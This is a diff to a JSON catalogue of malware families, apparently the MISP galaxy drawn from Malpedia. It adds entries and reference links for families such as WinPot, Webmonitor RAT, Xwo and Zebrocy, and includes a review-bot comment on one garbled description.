@@ -15665,6 +17844,19 @@ "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wallyshack", + "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bd92907-c858-4164-87d6-fec0f3595e69", + "value": "WallyShack" + }, { "description": "", "meta": { @@ -15893,11 +18085,12 @@ "value": "WebC2-Yahoo" }, { - "description": "", + "description": "On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.'\r\nUnit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", + "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], "synonyms": [], "type": [] @@ -15936,7 +18129,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], 
@@ -15952,11 +18145,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://github.com/TKCERT/winnti-suricata-lua", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://github.com/TKCERT/winnti-nmap-script", "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + "https://github.com/TKCERT/winnti-nmap-script", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://securelist.com/games-are-over/70991/", + "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" ], "synonyms": [], "type": [] @@ -15964,6 +18159,22 @@ "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (Windows)" }, + { + "description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", + "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", + "https://securelist.com/atm-robber-winpot/89611/" + ], + "synonyms": [ + "ATMPot" + ], + "type": [] + }, + "uuid": "893a1da2-ae35-4877-8cde-3f532543af36", + "value": "WinPot" + }, { "description": "", "meta": { 
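Review bot: The WinPot description is garbled ("is created to make ATMs by a popular ATM vendor to automatically dispense"), which matters for a field that is shown verbatim in the MISP UI and exported to downstream consumers. A minimal rewording that keeps the stated meaning is `"description": "WinPot is designed to make ATMs from a popular ATM vendor automatically dispense all cash from their most valuable cassettes.",`. The Winnti hunk just above only reorders and extends refs and needs no change.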
@@ -16062,16 +18273,30 @@ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", + "value": "WSCSPL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [ @@ -16156,7 +18381,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], 
@@ -16203,12 +18428,26 @@ "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, + { + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", + "https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a57cd75-4572-47c2-b5ef-55df978258de", + "value": "Xwo" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ 
@@ -16284,8 +18523,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy",
+ "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/",
+ "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware",
 "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
- "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
+ "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
+ "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
+ "https://securelist.com/a-zebrocy-go-downloader/89419/"
 ],
 "synonyms": [
 "Zekapab"
@@ -16336,6 +18582,7 @@
 ],
 "synonyms": [
 "Max++",
+ "Sirefef",
 "Smiscer"
 ],
 "type": []
@@ -16553,5 +18800,5 @@
 "value": "Zyklon"
 }
 ],
- "version": 1838
+ "version": 2559
 }